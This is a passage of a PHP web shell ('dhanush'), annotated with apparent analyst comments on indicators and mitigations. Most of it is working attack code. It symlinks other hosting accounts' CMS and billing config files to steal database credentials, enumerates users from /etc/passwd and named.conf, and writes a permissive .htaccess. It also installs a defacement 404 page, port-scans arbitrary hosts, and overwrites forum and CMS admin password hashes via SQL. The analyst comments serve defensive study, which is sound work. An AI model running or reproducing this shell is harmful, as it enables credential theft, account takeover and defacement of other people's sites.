1281 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1282 symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1283 symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1284 symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1285 symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1286 symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1287 symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1288 symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1289 symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1290 symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1291 symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1292 symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1293 symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1294 symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1295 symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1296 symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1297 symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1298 symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1299 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1300 symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1301 symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1302 symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1303 symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1304 symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1305 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1306 symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1307 symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1308 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1309 symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1310 symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1311 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1312 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb7.txt');
1313 symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1314 symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1315 symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1316 symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1317 symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1318 symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1319 symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1320 symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1321 symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1322 symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1323 symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1324 symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1325 symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1326 symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1327 symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1328 symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1329 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1330 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1331 symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1332 symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1333 symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1334 symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1335 symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1336 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1337 }
// Chooses one of three sources for account names and calls syml() once per name. Every path
// creates a working directory under the script's current directory ("dhanushSPT" or
// "dhanushST"), chdir()s into it so the links land there, and prints a link to it built from
// $url. Those directory names, plus a transient "test.txt", are filesystem indicators.
// Containment: remove the directory and its links, then review which targets were readable
// by the web server user and rotate the credentials stored in them.
1338 if(isset($_REQUEST['passwd']))
1339 {
 // Source 1: text supplied by the client in the "passwd" request field.
1340 $getetc = trim($_REQUEST['passwd']);
1341
1342 mkdir("dhanushSPT");
1343 chdir("dhanushSPT");
1344
 // The submitted text is round-tripped through test.txt and read back line by line.
1345 $myfile = fopen("test.txt","w");
1346 fputs($myfile,$getetc);
1347 fclose($myfile);
1348
1349 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1350 while(!feof($file))
1351 {
1352 $s = fgets($file);
1353 $matches = array();
 // Captures the text between the first "/" and the next ":/" on the line; for passwd-style
 // lines that is presumably the home-directory field -- confirm against sample input.
1354 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1355 $matches = str_replace("home/","",$matches[1]);
 // Skips empty or over-12-character values and a fixed list of system directories.
1356 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1357 continue;
1358 syml($matches,$matches);
1359 }
1360 fclose($file);
1361 unlink("test.txt");
1362 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1363 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1364
1365 }
1366 else
1367 {
 // Source 2: zone names read from /etc/named.conf, when the web server user can read it.
1368 $d0mains = @file("/etc/named.conf");
1369 if($d0mains)
1370 {
1371 mkdir("dhanushST");
1372 chdir("dhanushST");
1373
1374 foreach($d0mains as $d0main)
1375 {
 // eregi() was removed in PHP 7.0, so this path only runs on older interpreters.
1376 if(eregi("zone",$d0main))
1377 {
1378 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1379 flush();
1380
1381 if(strlen(trim($domains[1][0])) > 2)
1382 {
 // Maps the zone to an account through the owner of /etc/valiases/<zone>
 // (presumably a cPanel-style layout -- confirm on the affected host).
1383 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1384
1385 syml($user['name'],$domains[1][0]);
1386 }
1387 }
1388 }
1389 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1390 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1391 }
1392 else
1393 {
 // Source 3: /etc/named.conf was unreadable, so account records for UIDs 0..1000 are
 // looked up with posix_getpwuid() and joined into passwd-like lines.
1394 mkdir("dhanushSPT");
1395 chdir("dhanushSPT");
1396 $temp = "";
1397 $val1 = 0;
1398 $val2 = 1000;
1399 for(;$val1 <= $val2;$val1++)
1400 {
1401 $uid = @posix_getpwuid($val1);
1402 if ($uid)
1403 $temp .= join(':',$uid)."\n";
1404 }
1405 echo '<br/>';
1406 $temp = trim($temp);
1407
1408 $file5 = fopen("test.txt","w");
1409 fputs($file5,$temp);
1410 fclose($file5);
1411
1412
 // Same parse-and-filter loop as in the "passwd" branch above.
1413 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1414 while(!feof($file))
1415 {
1416 $s = fgets($file);
1417 $matches = array();
1418 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1419 $matches = str_replace("home/","",$matches[1]);
1420 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1421 continue;
1422 syml($matches,$matches);
1423 }
1424 fclose($file);
1425 echo "</table>";
1426 unlink("test.txt");
1427 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1428 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1429 }
1430 }
1431 }
1432 else
1433 echo "<center>Cannot Complete the task!!!!</center>";
1434
1435}
// Handler for the "symlinkfile" query parameter: when no "file" parameter is present it
// renders a one-field form, pre-filled with /etc/passwd, whose button passes the typed path
// to getdata('symlinkmyfile', ...) -- a JavaScript helper defined outside this block. No
// filesystem change happens in this branch.
1436else if(isset($_GET["symlinkfile"]))
1437{
1438 if(!isset($_GET['file']))
1439 {
1440 ?>
1441 <center>
1442 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
1443 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
1444 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
1445 </form></center>
1446 <br><br>
1447 <?php
1448 }
1449}
1450
// Handler for the "symlinkmyfile" query parameter (Linux hosts only): creates a link named
// "symlink<N>" in the current directory for the path given in the "myfile" query parameter,
// using a temporary "fakesymlink" entry and scaffold directories, then prints a URL to it.
// Artifacts left behind: a 16-level "cx/cx/..." directory chain, a directory tree mirroring
// the requested path, a "fakesymlink" directory, and one or more "symlink<N>" links.
// NOTE(review): swapping "fakesymlink" from a link to a real directory looks intended to get
// the final link past path restrictions -- confirm in a sandbox before relying on that reading.
// Mitigation: add symlink to PHP's disable_functions and serve with Apache
// "Options SymLinksIfOwnerMatch" rather than FollowSymLinks.
1451else if(isset($_GET['symlinkmyfile']))
1452{
1453 if(stristr(php_uname(),"Linux"))
1454 {
1455 $fakedir="cx";
1456 $fakedep=16;
1457
1458 $num=0; // offset of symlink.$num
1459
1460 if(!empty($_GET['myfile']))
1461 $file=$_GET['myfile'];
1462 else $file="";
1463
1464 if(empty($file))
1465 exit;
1466
 // Only reports an unwritable directory; execution continues either way.
1467 if(!is_writable("."))
1468 echo "not writable directory";
1469
 // Assigned but not read again in this branch.
1470 $level=0;
1471
 // Build the nested scaffold directories, descending one level per iteration.
1472 for($as=0;$as<$fakedep;$as++)
1473 {
1474 if(!file_exists($fakedir))
1475 mkdir($fakedir);
1476 chdir($fakedir);
1477 }
1478
 // Climb back up, stopping one level short of the starting directory.
1479 while(1<$as--) chdir("..");
1480
 // Recreate each component of the requested path as a real directory, counting the
 // levels descended in $as so they can be undone below.
1481 $hardstyle = explode("/", $file);
1482
1483 for($a=0;$a<count($hardstyle);$a++)
1484 {
1485 if(!empty($hardstyle[$a]))
1486 {
1487 if(!file_exists($hardstyle[$a]))
1488 mkdir($hardstyle[$a]);
1489 chdir($hardstyle[$a]);
1490 $as++;
1491 }
1492 }
1493 $as++;
1494 while($as--)
1495 chdir("..");
1496
 // Clear any leftover "fakesymlink" from an earlier run; errors are suppressed.
1497 @rmdir("fakesymlink");
1498 @unlink("fakesymlink");
1499
1500 @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
1501
 // Try "symlink0", "symlink1", ... until a link name is free. There is no upper bound, so
 // a persistent failure loops until the request is aborted.
1502 while(1)
1503 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
1504 else $num++;
1505
1506 @unlink("fakesymlink");
1507 mkdir("fakesymlink");
1508
1509 echo '<CENTER>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</CENTER>';
1510 }
1511 else
1512 echo '<CENTER>Cannot Create Symlink</CENTER>';
1513}
// Handler for the "404new" request parameter: renders a textarea named "message" with default
// text. The Save button passes its value to my404page(), a JavaScript helper defined outside
// this block.
// NOTE(review): presumably that helper posts the text to the "404page" handler -- confirm.
1514else if(isset($_REQUEST['404new']))
1515{
1516 ?>
1517 <form>
1518 <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
1519 <input type="button" onClick="my404page(message.value)" value=" Save " class=but></center>
1520 </br>
1521 </form>
1522 <?php
1523}
// Handler for the "404page" request parameter: replaces the site's 404 error page. It appends
// an "ErrorDocument 404 <dir>404.html" line to .htaccess in the current directory and writes
// 404.html there, using either the POSTed "message" or the base64-decoded $ind value defined
// at the top of the file.
// Detection: an unexpected ErrorDocument line at the end of .htaccess (terminated "\n\r"
// rather than "\r\n") and a 404.html with a recent modification time.
// Mitigation: deny write access to .htaccess for the web server user, or restrict overrides
// with AllowOverride so a dropped ErrorDocument directive is ignored.
1524else if(isset($_REQUEST['404page']))
1525{
 // $url becomes the request URI with its last path segment removed (the script's directory).
1526 $url = $_SERVER['REQUEST_URI'];
1527 $path=explode('/',$url);
1528 $url =str_replace($path[count($path)-1],'',$url);
1529 if(isset($_POST['message']))
1530 {
 // Opened in append mode, so existing directives are kept and repeat runs add duplicates.
1531 if($myfile = fopen(".htaccess", "a"))
1532 {
1533 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
 // The POSTed body is written verbatim; neither handle is closed in this branch.
1534 if($myfilee = fopen("404.html", "w+"))
1535 {
1536 fwrite($myfilee, $_POST['message']);
1537 }
1538 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1539 }
1540 else
1541 echo "<center>Cannot Set 404 Page</center>";
1542 }
1543 else if(strlen($ind) != 0)
1544 {
 // No message supplied: fall back to the built-in page stored base64-encoded in $ind.
1545 if($myfile = fopen(".htaccess", "a"))
1546 {
1547 fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r");
1548
1549 if($myfilee = fopen("404.html", "w+"))
1550 {
1551 fwrite($myfilee, base64_decode($ind));
1552
1553 fclose($myfilee);
1554 echo "<center><font class=txt>Done setting 404 Page !!!!</font></center>";
1555 }
1556 fclose($myfile);
1557 }
1558 else
1559 {
1560 echo "<center>Cannot Set 404 Page</center>";
1561 }
1562 }
1563 else
1564 echo "<center>Nothing Specified in the shell</center>";
1565}
// Handler for the "domains" query parameter: embeds an iframe whose URL is
// http://sameip.org/ip/ followed by the SERVER_ADDR environment value. The iframe is loaded
// by the viewer's browser, so the request to that third-party site does not originate from
// the server; the server address is disclosed to it in the URL.
1566else if(isset($_GET["domains"]))
1567{
1568 ?><center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center><?php
1569}
1570else if(isset($_GET["symlink"]))
1571{
1572 $d0mains = @file("/etc/named.conf");
1573 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1574 $path=explode('/',$url);
1575 $url =str_replace($path[count($path)-1],'',$url);
1576 if($d0mains)
1577 {
1578 @mkdir("dhanush",0777);
1579 @chdir("dhanush");
1580 execmd("ln -s / root");
1581 $file3 = 'Options all
1582 DirectoryIndex Sux.html
1583 AddType text/plain .php
1584 AddHandler server-parsed .php
1585 AddType text/plain .html
1586 AddHandler txt .html
1587 Require None
1588 Satisfy Any
1589 ';
1590 $fp3 = fopen('.htaccess','w');
1591 $fw3 = fwrite($fp3,$file3);
1592 @fclose($fp3);
1593 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr align =center><td align=center><font size=3 >S. No.</font></td><td align=center><font size=3 >Domains</font></td><td align=center><font size=3 >Users</font></td><td align=center><font size=3 >Symlink</font></td><td align=center><font size=3 >Information</font></td></tr>";
1594
1595 $dcount = 1;
1596 foreach($d0mains as $d0main)
1597 {
1598 if(eregi("zone",$d0main))
1599 {
1600 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1601 flush();
1602
1603 if(strlen(trim($domains[1][0])) > 2)
1604 {
1605 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1606
1607 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt>".$user['name']."</font></td><td><a href=".$url."dhanush/root/home/".$user['name']."/public_html target='_blank'><font class=txt>Symlink</font></a></td><td><font class=txt><a href=?info=".$domains[1][0]." target=_blank>info</a></font></td></tr>"; flush();
1608 $dcount++;
1609 }
1610 }
1611
1612 }
1613 echo "</table>";
1614 }
1615 else
1616 {
1617 if(stristr(php_uname(),"Linux"))
1618 {
1619 ?>
1620 <div style="float:left;position:fixed;">
1621 <form>
1622 <table cellpadding="9">
1623 <tr>
1624 <th colspan="2">Get User Name</th>
1625 </tr>
1626 <tr>
1627 <td>Enter Website Name :</td>
1628 <td><input type="text" name="sitename" value="sitename.com" class="sbox"></td>
1629 </tr>
1630 <tr>
1631 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
1632 </tr>
1633 <tr>
1634 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
1635 </tr>
1636 </table>
1637 </form>
1638 </div>
1639 <?php
1640 $TEST=@file('/etc/passwd');
1641 if ($TEST)
1642 {
1643 @mkdir("dhanush",0777);
1644 @chdir("dhanush");
1645 execmd("ln -s / root");
1646 $file3 = 'Options all
1647 DirectoryIndex Sux.html
1648 AddType text/plain .php
1649 AddHandler server-parsed .php
1650 AddType text/plain .html
1651 AddHandler txt .html
1652 Require None
1653 Satisfy Any
1654 ';
1655 $fp3 = fopen('.htaccess','w');
1656 $fw3 = fwrite($fp3,$file3);
1657 @fclose($fp3);
1658
1659 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1660
1661 $dcount = 1;
1662 $file = fopen("/etc/passwd", "r");
1663 //Output a line of the file until the end is reached
1664 while(!feof($file))
1665 {
1666 $s = fgets($file);
1667 $matches = array();
1668 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1669 $matches = str_replace("home/","",$matches[1]);
1670 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1671 continue;
1672 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1673 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1674 $dcount++;
1675 }
1676 fclose($file);
1677
1678 echo "</table>";
1679 }
1680 else
1681 {
1682 @mkdir("dhanush",0777);
1683 @chdir("dhanush");
1684 execmd("ln -s / root");
1685 $file3 = 'Options all
1686 DirectoryIndex Sux.html
1687 AddType text/plain .php
1688 AddHandler server-parsed .php
1689 AddType text/plain .html
1690 AddHandler txt .html
1691 Require None
1692 Satisfy Any
1693 ';
1694 $fp3 = fopen('.htaccess','w');
1695 $fw3 = fwrite($fp3,$file3);
1696 @fclose($fp3);
1697
1698 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
1699
1700 $temp = "";
1701 $val1 = 0;
1702 $val2 = 1000;
1703 for(;$val1 <= $val2;$val1++)
1704 {
1705 $uid = @posix_getpwuid($val1);
1706 if ($uid)
1707 $temp .= join(':',$uid)."\n";
1708 }
1709 echo '<br/>';
1710 $temp = trim($temp);
1711
1712 $file5 = fopen("test.txt","w");
1713 fputs($file5,$temp);
1714 fclose($file5);
1715
1716 $dcount = 1;
1717 $file = fopen("test.txt", "r");
1718 while(!feof($file))
1719 {
1720 $s = fgets($file);
1721 $matches = array();
1722 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1723 $matches = str_replace("home/","",$matches[1]);
1724 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1725 continue;
1726 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
1727 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1728 $dcount++;
1729 }
1730 fclose($file);
1731 echo "</table>";
1732 unlink("test.txt");
1733 }
1734 }
1735 else
1736 echo "<center><font size=4 >Cannot create Symlink</font></center>";
1737 }
1738}
1739else if(isset($_GET['host']) && isset($_GET['protocol']))
1740{
 // Analyst note: TCP connect probe driven entirely by the query string.
 // 'host' is taken from $_GET unvalidated; the 24 hard-coded ports below are
 // each tried once with a 1-second timeout, and ports that accept are echoed.
 // 'protocol' is only passed to getservbyport(); that result ($service) is
 // never used, and fsockopen() receives the bare host value.
 // The sockets returned by fsockopen() are never closed in this block.
 // Detection: a web-server worker opening short bursts of outbound
 // connections to ports such as 21/22/23/445/5900/666x is unusual for normal
 // site traffic. Mitigation: default-deny egress from the web tier.
1741 echo "Open Ports: ";
1742 $host = $_GET['host'];
1743 $proto = $_GET['protocol'];
1744 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
1745 for($current = 0; $current <= 23; $current++)
1746 {
1747 $currents = $myports[$current];
1748 $service = getservbyport($currents, $proto);
1749 // Try to connect to port
1750 $result = fsockopen($host, $currents, $errno, $errstr, 1);
1751 // Show results
1752 if($result)
1753 echo "<font class=txt>$currents, </font>";
1754 }
1755}
1756else if(isset($_REQUEST['forumpass']))
1757{
 // Analyst note: credential-overwrite handler for forum/CMS databases.
 // Database host, name, user and password (f1..f4), the table prefix and the
 // replacement password all arrive as request parameters, mostly via $_GET,
 // so they end up in web-server access logs; the phpbb and ipb branches read
 // newipbpass/ipbuid from $_POST instead.
 // $_GET['forums'] selects the target schema (vb, mybb, smf, phpbb, ipb, wp,
 // joomla). Each branch connects with mysql_connect() and runs one UPDATE
 // that replaces a stored password hash; every value is interpolated into
 // the SQL text unescaped.
 // ext/mysql (mysql_connect/mysql_query) was removed in PHP 7.0, so these
 // branches only function on PHP 5.x hosts.
 // Indicators left in the database: the vb, mybb and ipb branches write the
 // constant salts "eghjghrtd", "jeghj" and "eghj" into the salt column; the
 // wp branch also rewrites user_login; the joomla branch rewrites username
 // on rows named 'Super User' (and 'Administrator' when a prefix is given).
 // Mitigation: keep DB credentials out of web-readable config where the PHP
 // user can reach them only if needed, restrict the DB account's privileges
 // and source hosts, and alert on password-hash changes for admin accounts.
1758 $localhost = $_GET['f1'];
1759 $database = $_GET['f2'];
1760 $username = $_GET['f3'];
1761 $password = $_GET['f4'];
1762 $prefix = $_GET['prefix'];
1763 $newpass = $_GET['newpass'];
1764 $uid = $_GET['uid'];
1765
1766 if($_GET['forums'] == "vb")
1767 {
 // vb: hash is md5(md5(password) . salt) with the constant salt below.
1768 $newpass = $_GET['newipbpass'];
1769 $uid = $_GET['ipbuid'];
1770 $con = mysql_connect($localhost,$username,$password);
1771 $db = mysql_select_db($database,$con);
1772 $salt = "eghjghrtd";
1773 $newpassword = md5(md5($newpass) . $salt);
1774 if($prefix == "" || $prefix == null)
1775 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1776 else
1777 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1778 if($sql)
1779 {
1780 mysql_close($con);
1781 echo "<font class=txt>Password Changed Successfully</font>";
1782 }
1783 else
1784 echo "Cannot Change Password";
1785 }
1786 else if($_GET['forums'] == "mybb")
1787 {
 // mybb: hash is md5(md5(salt) . md5(password)) with the constant salt below.
1788 $newpass = $_GET['newipbpass'];
1789 $uid = $_GET['ipbuid'];
1790 $con = mysql_connect($localhost,$username,$password);
1791 $db = mysql_select_db($database,$con);
1792 $salt = "jeghj";
1793 $newpassword = md5(md5($salt).md5($newpass));
1794 if($prefix == "" || $prefix == null)
1795 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1796 else
1797 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1798 if($sql)
1799 {
1800 mysql_close($con);
1801 echo "<font class=txt>Password Changed Successfully</font>";
1802 }
1803 else
1804 echo "Cannot Change Password";
1805 }
1806 else if($_GET['forums'] == "smf")
1807 {
 // smf: looks up member_name first, then stores sha1(lowercase name . password).
 // The SELECT places $uid in the query without quotes.
1808 $newpass = $_GET['newipbpass'];
1809 $uid = $_GET['ipbuid'];
1810 $con = mysql_connect($localhost,$username,$password);
1811 $db = mysql_select_db($database,$con);
1812
1813 if($prefix == "" || $prefix == null)
1814 {
1815 $result = mysql_query("select member_name from smf_members where id_member = $uid");
1816 $row = mysql_fetch_array($result);
1817 $membername = $row['member_name'];
1818 $newpassword = sha1(strtolower($membername).$newpass);
1819 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
1820 }
1821 else
1822
1823 {
1824 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
1825 $row = mysql_fetch_array($result);
1826 $membername = $row['member_name'];
1827 $newpassword = sha1(strtolower($membername).$newpass);
1828 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
1829 }
1830 if($sql)
1831 {
1832 mysql_close($con);
1833 echo "<font class=txt>Password Changed Successfully</font>";
1834 }
1835 else
1836 echo "Cannot Change Password";
1837 }
1838 else if($_GET['forums'] == "phpbb")
1839 {
 // phpbb: unsalted md5; password and user id are read from $_POST here.
1840 $newpass = $_POST['newipbpass'];
1841 $uid = $_POST['ipbuid'];
1842 $con = mysql_connect($localhost,$username,$password);
1843 $db = mysql_select_db($database,$con);
1844
1845 $newpassword = md5($newpass);
1846 if(empty($prefix) || $prefix == null)
1847 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
1848 else
1849 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
1850 if($sql)
1851 {
1852 mysql_close($con);
1853 echo "<font class=txt>Password Changed Successfully</font>";
1854 }
1855 else
1856 echo "Cannot Change Password";
1857 }
1858 else if($_GET['forums'] == "ipb")
1859 {
 // ipb: md5(md5(salt) . md5(password)) with the constant salt below;
 // password and user id are read from $_POST here.
1860 $newpass = $_POST['newipbpass'];
1861 $uid = $_POST['ipbuid'];
1862 $con = mysql_connect($localhost,$username,$password);
1863 $db = mysql_select_db($database,$con);
1864 $salt = "eghj";
1865 $newpassword = md5(md5($salt).md5($newpass));
1866 if($prefix == "" || $prefix == null)
1867 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1868 else
1869 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1870 if($sql)
1871 {
1872 mysql_close($con);
1873 echo "<font class=txt>Password Changed Successfully</font>";
1874 }
1875 else
1876 echo "Cannot Change Password";
1877 }
1878 else if($_GET['forums'] == "wp")
1879 {
 // wp: unsalted md5 written to user_pass; user_login is overwritten as well.
1880 $uname = $_GET['uname'];
1881 $con = mysql_connect($localhost,$username,$password);
1882 $db = mysql_select_db($database,$con);
1883
1884 $newpassword = md5($newpass);
1885 if($prefix == "" || $prefix == null)
1886 $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1887 else
1888 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1889 if($sql)
1890 {
1891 mysql_close($con);
1892 echo "<font class=txt>Password Changed Successfully</font>";
1893 }
1894 else
1895 echo "Cannot Change Password";
1896 }
1897 else if($_GET['forums'] == "joomla")
1898 {
 // joomla: unsalted md5; rows are selected by display name, not by id.
1899 $newjoomlapass = $_GET['newjoomlapass'];
1900 $joomlauname = $_GET['username'];
1901 $con = mysql_connect($localhost,$username,$password);
1902 $db = mysql_select_db($database,$con);
1903
1904 $newpassword = md5($newjoomlapass);
1905 if($prefix == "" || $prefix == null)
